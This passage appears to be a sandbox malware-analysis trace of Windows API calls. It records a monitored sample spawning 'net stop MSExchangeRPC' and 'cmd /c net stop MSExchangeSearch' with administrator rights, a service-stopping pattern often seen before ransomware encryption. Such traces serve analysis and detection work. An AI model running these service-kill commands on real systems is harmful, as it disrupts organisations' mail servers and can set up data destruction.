_wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0139.669] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0139.669] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0139.669] _wcsicmp (_String1="session", _String2="stop") returned -15 [0139.669] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0139.669] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0139.669] _wcsicmp (_String1="share", _String2="stop") returned -12 [0139.669] _wcsicmp (_String1="start", _String2="stop") returned -14 [0139.669] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0139.669] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0139.669] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0139.669] _wcsicmp (_String1="accounts", _String2="MSExchangeRPC") returned -12 [0139.669] _wcsicmp (_String1="computer", _String2="MSExchangeRPC") returned -10 [0139.669] _wcsicmp (_String1="config", _String2="MSExchangeRPC") returned -10 [0139.669] _wcsicmp (_String1="continue", _String2="MSExchangeRPC") returned -10 [0139.669] _wcsicmp (_String1="cont", _String2="MSExchangeRPC") returned -10 [0139.669] _wcsicmp (_String1="file", _String2="MSExchangeRPC") returned -7 [0139.669] _wcsicmp (_String1="files", _String2="MSExchangeRPC") returned -7 [0139.669] _wcsicmp (_String1="group", _String2="MSExchangeRPC") returned -6 [0139.669] _wcsicmp (_String1="groups", _String2="MSExchangeRPC") returned -6 [0139.669] _wcsicmp (_String1="help", _String2="MSExchangeRPC") returned -5 [0139.669] _wcsicmp (_String1="helpmsg", _String2="MSExchangeRPC") returned -5 [0139.669] _wcsicmp (_String1="localgroup", _String2="MSExchangeRPC") returned -1 [0139.669] _wcsicmp (_String1="pause", _String2="MSExchangeRPC") returned 3 [0139.669] _wcsicmp (_String1="session", _String2="MSExchangeRPC") returned 6 [0139.669] _wcsicmp (_String1="sessions", _String2="MSExchangeRPC") returned 6 [0139.669] _wcsicmp (_String1="sess", _String2="MSExchangeRPC") returned 6 [0139.669] _wcsicmp (_String1="share", _String2="MSExchangeRPC") returned 6 [0139.669] _wcsicmp (_String1="start", _String2="MSExchangeRPC") returned 6 [0139.669] _wcsicmp (_String1="stats", _String2="MSExchangeRPC") returned 6 [0139.669] _wcsicmp (_String1="statistics", _String2="MSExchangeRPC") returned 6 [0139.669] _wcsicmp (_String1="stop", _String2="MSExchangeRPC") returned 6 [0139.669] _wcsicmp (_String1="time", _String2="MSExchangeRPC") returned 7 [0139.669] _wcsicmp (_String1="user", _String2="MSExchangeRPC") returned 8 [0139.669] _wcsicmp (_String1="users", _String2="MSExchangeRPC") returned 8 [0139.669] _wcsicmp (_String1="msg", _String2="MSExchangeRPC") returned 2 [0139.669] _wcsicmp (_String1="messenger", _String2="MSExchangeRPC") returned -14 [0139.669] _wcsicmp (_String1="receiver", _String2="MSExchangeRPC") returned 5 [0139.669] _wcsicmp (_String1="rcv", _String2="MSExchangeRPC") returned 5 [0139.669] _wcsicmp (_String1="netpopup", _String2="MSExchangeRPC") returned 1 [0139.669] _wcsicmp (_String1="redirector", _String2="MSExchangeRPC") returned 5 [0139.669] _wcsicmp (_String1="redir", _String2="MSExchangeRPC") returned 5 [0139.669] _wcsicmp (_String1="rdr", _String2="MSExchangeRPC") returned 5 [0139.669] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeRPC") returned 10 [0139.669] _wcsicmp (_String1="work", _String2="MSExchangeRPC") returned 10 [0139.670] _wcsicmp (_String1="wksta", _String2="MSExchangeRPC") returned 10 [0139.670] _wcsicmp (_String1="prdr", _String2="MSExchangeRPC") returned 3 [0139.670] _wcsicmp (_String1="devrdr", _String2="MSExchangeRPC") returned -9 [0139.670] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeRPC") returned -1 [0139.670] _wcsicmp (_String1="server", _String2="MSExchangeRPC") returned 6 [0139.670] _wcsicmp (_String1="svr", _String2="MSExchangeRPC") returned 6 [0139.670] _wcsicmp (_String1="srv", _String2="MSExchangeRPC") returned 6 [0139.670] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeRPC") returned -1 [0139.670] _wcsicmp (_String1="alerter", _String2="MSExchangeRPC") returned -12 [0139.670] _wcsicmp (_String1="netlogon", _String2="MSExchangeRPC") returned 1 [0139.670] _wcsupr (in: _String="MSExchangeRPC" | out: _String="MSEXCHANGERPC") returned="MSEXCHANGERPC" [0139.670] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xe82630 [0139.672] GetServiceKeyNameW (in: hSCManager=0xe82630, lpDisplayName="MSEXCHANGERPC", lpServiceName=0x10a8cb0, lpcchBuffer=0xb5f80c | out: lpServiceName="", lpcchBuffer=0xb5f80c) returned 0 [0139.672] _wcsicmp (_String1="msg", _String2="MSEXCHANGERPC") returned 2 [0139.672] _wcsicmp (_String1="messenger", _String2="MSEXCHANGERPC") returned -14 [0139.672] _wcsicmp (_String1="receiver", _String2="MSEXCHANGERPC") returned 5 [0139.672] _wcsicmp (_String1="rcv", _String2="MSEXCHANGERPC") returned 5 [0139.672] _wcsicmp (_String1="redirector", _String2="MSEXCHANGERPC") returned 5 [0139.672] _wcsicmp (_String1="redir", _String2="MSEXCHANGERPC") returned 5 [0139.672] _wcsicmp (_String1="rdr", _String2="MSEXCHANGERPC") returned 5 [0139.672] _wcsicmp (_String1="workstation", _String2="MSEXCHANGERPC") returned 10 [0139.672] _wcsicmp (_String1="work", _String2="MSEXCHANGERPC") returned 10 [0139.672] _wcsicmp (_String1="wksta", _String2="MSEXCHANGERPC") returned 10 [0139.672] _wcsicmp (_String1="prdr", _String2="MSEXCHANGERPC") returned 3 [0139.672] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGERPC") returned -9 [0139.672] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGERPC") returned -1 [0139.672] _wcsicmp (_String1="server", _String2="MSEXCHANGERPC") returned 6 [0139.673] _wcsicmp (_String1="svr", _String2="MSEXCHANGERPC") returned 6 [0139.673] _wcsicmp (_String1="srv", _String2="MSEXCHANGERPC") returned 6 [0139.673] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGERPC") returned -1 [0139.673] _wcsicmp (_String1="alerter", _String2="MSEXCHANGERPC") returned -12 [0139.673] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGERPC") returned 1 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="WORKSTATION") returned -10 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="LanmanWorkstation") returned 1 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="SERVER") returned -6 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="LanmanServer") returned 1 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="BROWSER") returned 11 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="BROWSER") returned 11 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="MESSENGER") returned 14 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="MESSENGER") returned 14 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="NETRUN") returned -1 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="NETRUN") returned -1 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="SPOOLER") returned -6 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="SPOOLER") returned -6 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="ALERTER") returned 12 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="ALERTER") returned 12 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="NETLOGON") returned -1 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="NETLOGON") returned -1 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="NETPOPUP") returned -1 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="NETPOPUP") returned -1 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="SQLSERVER") returned -6 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="SQLSERVER") returned -6 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="REPLICATOR") returned -5 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="REPLICATOR") returned -5 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="REMOTEBOOT") returned -5 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="REMOTEBOOT") returned -5 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="TIMESOURCE") returned -7 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="TIMESOURCE") returned -7 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="AFP") returned 12 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="AFP") returned 12 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="UPS") returned -8 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="UPS") returned -8 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="XACTSRV") returned -11 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="XACTSRV") returned -11 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="TCPIP") returned -7 [0139.673] _wcsicmp (_String1="MSEXCHANGERPC", _String2="TCPIP") returned -7 [0139.673] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xe83758 [0139.674] OpenServiceW (hSCManager=0xe83758, lpServiceName="MSEXCHANGERPC", dwDesiredAccess=0x84) returned 0x0 [0139.674] GetLastError () returned 0x424 [0139.674] CloseServiceHandle (hSCObject=0xe83758) returned 1 [0139.674] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0139.674] LoadLibraryW (lpLibFileName="NETMSG") returned 0xd20000 [0139.675] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xd20000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0139.676] GetFileType (hFile=0x40) returned 0x2 [0139.676] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb5f6a8 | out: lpMode=0xb5f6a8) returned 1 [0139.676] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xb5f6b4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xb5f6b4*=0x1e) returned 1 [0139.676] GetFileType (hFile=0x40) returned 0x2 [0139.676] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb5f6a8 | out: lpMode=0xb5f6a8) returned 1 [0139.676] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xb5f6b4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xb5f6b4*=0x2) returned 1 [0139.677] _ultow (in: _Dest=0x889, _Radix=11925192 | out: _Dest=0x889) returned="2185" [0139.677] FormatMessageW (in: dwFlags=0x2800, lpSource=0xd20000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0139.677] GetFileType (hFile=0x40) returned 0x2 [0139.677] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb5f698 | out: lpMode=0xb5f698) returned 1 [0139.677] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xb5f6a4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xb5f6a4*=0x34) returned 1 [0139.677] GetFileType (hFile=0x40) returned 0x2 [0139.677] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xb5f698 | out: lpMode=0xb5f698) returned 1 [0139.677] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xb5f6a4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xb5f6a4*=0x2) returned 1 [0139.677] NetApiBufferFree (Buffer=0xe87fe0) returned 0x0 [0139.678] NetApiBufferFree (Buffer=0xe87ff8) returned 0x0 [0139.678] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeRPC" [0139.678] exit (_Code=2) Thread: id = 721 os_tid = 0x820 Process: id = "245" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x14cf1000" os_pid = "0x42c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeSearch" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11805 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 11806 start_va = 0xc60000 end_va = 0x4c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 11807 start_va = 0x4c60000 end_va = 0x4c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 11808 start_va = 0x4c80000 end_va = 0x4c80fff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 11809 start_va = 0x4c90000 end_va = 0x4ca3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c90000" filename = "" Region: id = 11810 start_va = 0x4cb0000 end_va = 0x4ceffff entry_point = 0x0 region_type = private name = "private_0x0000000004cb0000" filename = "" Region: id = 11811 start_va = 0x4cf0000 end_va = 0x4deffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 11812 start_va = 0x4df0000 end_va = 0x4df3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004df0000" filename = "" Region: id = 11813 start_va = 0x4e00000 end_va = 0x4e00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e00000" filename = "" Region: id = 11814 start_va = 0x4e10000 end_va = 0x4e11fff entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 11815 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11816 start_va = 0x7e9d0000 end_va = 0x7e9f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9d0000" filename = "" Region: id = 11817 start_va = 0x7e9f6000 end_va = 0x7e9f6fff entry_point = 0x0 region_type = private name = "private_0x000000007e9f6000" filename = "" Region: id = 11818 start_va = 0x7e9f7000 end_va = 0x7e9f7fff entry_point = 0x0 region_type = private name = "private_0x000000007e9f7000" filename = "" Region: id = 11819 start_va = 0x7e9fd000 end_va = 0x7e9fffff entry_point = 0x0 region_type = private name = "private_0x000000007e9fd000" filename = "" Region: id = 11820 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11821 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11822 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11823 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11824 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11825 start_va = 0x4fa0000 end_va = 0x4faffff entry_point = 0x0 region_type = private name = "private_0x0000000004fa0000" filename = "" Region: id = 11826 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11827 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11828 start_va = 0x5170000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 11829 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11870 start_va = 0x4c60000 end_va = 0x4c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 11871 start_va = 0x4e20000 end_va = 0x4eddfff entry_point = 0x4e20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11872 start_va = 0x4ee0000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 11873 start_va = 0x4fb0000 end_va = 0x50affff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 11874 start_va = 0x5130000 end_va = 0x513ffff entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 11875 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11876 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11877 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11878 start_va = 0x7e8d0000 end_va = 0x7e9cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e8d0000" filename = "" Region: id = 11879 start_va = 0x7e9fa000 end_va = 0x7e9fcfff entry_point = 0x0 region_type = private name = "private_0x000000007e9fa000" filename = "" Region: id = 11880 start_va = 0x4c70000 end_va = 0x4c73fff entry_point = 0x0 region_type = private name = "private_0x0000000004c70000" filename = "" Region: id = 11881 start_va = 0x4c80000 end_va = 0x4c83fff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 11882 start_va = 0x5270000 end_va = 0x55a6fff entry_point = 0x5270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 722 os_tid = 0xcb4 [0139.843] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0139.843] __set_app_type (_Type=0x1) [0139.843] __p__fmode () returned 0x77ac4d6c [0139.843] __p__commode () returned 0x77ac5b1c [0139.843] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0139.843] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0139.843] GetCurrentThreadId () returned 0xcb4 [0139.843] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb4) returned 0x84 [0139.843] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0139.844] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0139.844] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.846] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.846] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4defd38 | out: phkResult=0x4defd38*=0x0) returned 0x2 [0139.846] VirtualQuery (in: lpAddress=0x4defd3f, lpBuffer=0x4defcf0, dwLength=0x1c | out: lpBuffer=0x4defcf0*(BaseAddress=0x4def000, AllocationBase=0x4cf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.846] VirtualQuery (in: lpAddress=0x4cf0000, lpBuffer=0x4defcf0, dwLength=0x1c | out: lpBuffer=0x4defcf0*(BaseAddress=0x4cf0000, AllocationBase=0x4cf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.846] VirtualQuery (in: lpAddress=0x4cf1000, lpBuffer=0x4defcf0, dwLength=0x1c | out: lpBuffer=0x4defcf0*(BaseAddress=0x4cf1000, AllocationBase=0x4cf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.846] VirtualQuery (in: lpAddress=0x4cf3000, lpBuffer=0x4defcf0, dwLength=0x1c | out: lpBuffer=0x4defcf0*(BaseAddress=0x4cf3000, AllocationBase=0x4cf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.846] VirtualQuery (in: lpAddress=0x4df0000, lpBuffer=0x4defcf0, dwLength=0x1c | out: lpBuffer=0x4defcf0*(BaseAddress=0x4df0000, AllocationBase=0x4df0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.846] GetConsoleOutputCP () returned 0x1b5 [0139.846] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.846] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0139.847] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.847] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0139.847] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.847] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0139.847] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.847] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0139.847] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.847] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0139.847] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.847] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0139.847] GetEnvironmentStringsW () returned 0x5177d68* [0139.848] FreeEnvironmentStringsA (penv="A") returned 1 [0139.848] GetEnvironmentStringsW () returned 0x5177d68* [0139.848] FreeEnvironmentStringsA (penv="A") returned 1 [0139.848] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4deec9c | out: phkResult=0x4deec9c*=0x94) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x0, lpData=0x4deeca8*=0x48, lpcbData=0x4deeca4*=0x1000) returned 0x2 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x4, lpData=0x4deeca8*=0x1, lpcbData=0x4deeca4*=0x4) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x0, lpData=0x4deeca8*=0x1, lpcbData=0x4deeca4*=0x1000) returned 0x2 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x4, lpData=0x4deeca8*=0x0, lpcbData=0x4deeca4*=0x4) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x4, lpData=0x4deeca8*=0x40, lpcbData=0x4deeca4*=0x4) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x4, lpData=0x4deeca8*=0x40, lpcbData=0x4deeca4*=0x4) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x0, lpData=0x4deeca8*=0x40, lpcbData=0x4deeca4*=0x1000) returned 0x2 [0139.848] RegCloseKey (hKey=0x94) returned 0x0 [0139.848] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4deec9c | out: phkResult=0x4deec9c*=0x94) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x0, lpData=0x4deeca8*=0x40, lpcbData=0x4deeca4*=0x1000) returned 0x2 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x4, lpData=0x4deeca8*=0x1, lpcbData=0x4deeca4*=0x4) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x0, lpData=0x4deeca8*=0x1, lpcbData=0x4deeca4*=0x1000) returned 0x2 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x4, lpData=0x4deeca8*=0x0, lpcbData=0x4deeca4*=0x4) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x4, lpData=0x4deeca8*=0x9, lpcbData=0x4deeca4*=0x4) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x4, lpData=0x4deeca8*=0x9, lpcbData=0x4deeca4*=0x4) returned 0x0 [0139.848] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4deeca0, lpData=0x4deeca8, lpcbData=0x4deeca4*=0x1000 | out: lpType=0x4deeca0*=0x0, lpData=0x4deeca8*=0x9, lpcbData=0x4deeca4*=0x1000) returned 0x2 [0139.848] RegCloseKey (hKey=0x94) returned 0x0 [0139.848] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983c [0139.848] srand (_Seed=0x5ad2983c) [0139.848] GetCommandLineW () returned="/c net stop MSExchangeSearch" 